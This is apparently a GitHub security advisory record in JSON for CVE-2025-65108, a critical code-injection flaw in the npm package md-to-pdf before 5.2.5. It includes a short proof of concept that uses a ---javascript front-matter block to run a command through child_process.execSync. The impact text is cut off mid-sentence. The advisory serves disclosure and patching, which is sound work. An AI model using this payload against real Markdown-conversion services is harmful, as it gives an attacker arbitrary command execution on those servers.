{"id":"GHSA-547r-qmjm-8hvw","summary":"md-to-pdf vulnerable to arbitrary JavaScript code execution when parsing front matter","details":"### Summary\nA Markdown front-matter block that contains JavaScript delimiter causes the JS engine in gray-matter library to execute arbitrary code in the Markdown to PDF converter process of **md-to-pdf** library, resulting in remote code execution.\n\n### Details\n**md-to-pdf** uses the gray-matter library to parse front-matter. Gray-matter exposes a JavaScript engine that, when enabled or triggered by certain front-matter delimiters (e.g. ---js or ---javascript), will evaluate the front-matter contents as JavaScript. If user-supplied Markdown is fed to md-to-pdf and the front-matter contains malicious JS, the converter process will execute that code.\n\n\n### PoC\n```\nconst { mdToPdf } = require('md-to-pdf');\n\nvar payload = '---javascript\\n((require(\"child_process\")).execSync(\"calc.exe\"))\\n---RCE';\n\n(async () =\u003e {\n\tawait mdToPdf({ content: payload }, { dest: './output.pdf'});\n})();\n```\nRunning the PoC on Windows launches the calculator application, demonstrating arbitrary code execution.\n\n### Impact\n\n- Remote code execution in the process that performs Markdown-\u003ePDF conversion.\n- If the converter is run in a web app or cloud service, an attacker uploading malicious Markdown can execute arbitrary commands on the","aliases":["CVE-2025-65108"],"modified":"2025-11-25T19:48:40Z","published":"2025-11-20T17:48:11Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2025-11-20T17:48:11Z","cwe_ids":["CWE-94"],"severity":"CRITICAL","nvd_published_at":"2025-11-21T22:16:33Z"},"references":[{"type":"WEB","url":"https://github.com/simonhaenisch/md-to-pdf/security/advisories/GHSA-547r-qmjm-8hvw"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65108"},{"type":"WEB","url":"https://github.com/simonhaenisch/md-to-pdf/commit/46bdcf2051c8d1758b391c1353185a179a47a4d9"},{"type":"PACKAGE","url":"https://github.com/simonhaenisch/md-to-pdf"}],"affected":[{"package":{"name":"md-to-pdf","ecosystem":"npm","purl":"pkg:npm/md-to-pdf"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"5.2.5"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/11/GHSA-547r-qmjm-8hvw/GHSA-547r-qmjm-8hvw.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}]}